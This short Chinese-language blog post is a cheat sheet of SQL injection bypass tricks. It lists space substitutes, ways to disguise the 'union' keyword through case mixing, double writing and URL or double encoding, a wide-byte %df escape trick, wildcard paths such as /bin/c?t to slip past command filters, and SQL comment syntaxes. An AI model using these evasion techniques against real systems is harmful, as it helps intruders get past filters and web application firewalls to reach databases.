sql注入绕过姿势
目录
- 空格绕过
- 关键字绕过
- 注释
0x001注入绕过
1.空格绕过:
在注入过程中,空格被过滤了,那么可以使用其他代替空格进行绕过,下面都可以替代空格尝试;
tab
/**/
/*!union*/
/*!50000union*/
%0a %0b(垂直tab) %0c %0d
%20
%2520
2.关键字绕过(下面代替关键字的方式绕过):
大小写:uNion UnION UNion UNION
双写:ununionion 可用
url编码:union编码后为%75%6E%69%6F%6E
union部分编码u%6eion
UNION->%55%4E%49%4F%4E
asp:un%%%%%ion
双编码:%2575%256E%2569%256F%256E
>>绕过安全设备
宽字节:unicode,gbk
php:gpc=on 特殊符号前加转义字符:\
id=1'-->1\'
绕过:%df
1%df'-->1%df\'-->1%df%5c'-->1運'
通配符绕waf:加路径
*
?
绕过cat被过滤:
/bin/c?t
3.注释
>>注释sql语句包含:
mssql:--
mysql:--%20
#
%23(相当于#)
-- -
--+
//
;
/**/
/*!aaa*/
我的博客:https://www.cnblogs.com/loopkep
